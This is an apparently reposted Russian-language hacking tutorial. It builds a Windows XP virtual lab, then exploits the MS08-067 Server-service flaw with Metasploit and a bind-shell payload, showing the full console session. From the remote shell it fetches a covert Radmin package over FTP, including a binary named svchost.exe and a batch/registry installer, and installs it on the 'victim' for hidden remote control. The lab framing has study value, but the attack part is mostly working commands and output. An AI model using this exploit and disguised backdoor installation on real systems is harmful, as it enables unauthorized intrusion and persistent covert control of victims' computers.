Как разблокировать аккаунты, защитить компьютер и стать хакером
Полезные инструменты

Ваш IP

Узнай свой IP адрес

Проверить сайт

Test tools by WebSitePulse

Генератор MD5

1. Введите строку Строка:


2. Копировать MD5:

Реклама

интернетконецформыначалоформыАтаки на протокол
Атаки на ПО
Атаки на пользователя
Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG

Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG

адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG

Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG

Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG

Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG

IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG

Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG

#ПРИМЕР.#
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Сканим комп xspider’ом

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG

Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG

use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 3 — lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability…
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚?aa?i 5.1.2600]
(‘) S®a?®a ??i ? ©?a®a®aa, 1985-2001.
C:WINDOWSsystem32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG

Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.

http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG

Снял видео, там же и статья отформатированная в pdf:

http://ifolder.ru/10884195

http://kerny-auroras.blogspot.com/2009/03/windows.html

Скорость печати
Набирайте отображаемый текст и вы узнаете вашу скорость набора текста


Рейтинг@Mail.ru


Copyright © 2018 Как разблокировать аккаунт. Все права защищены.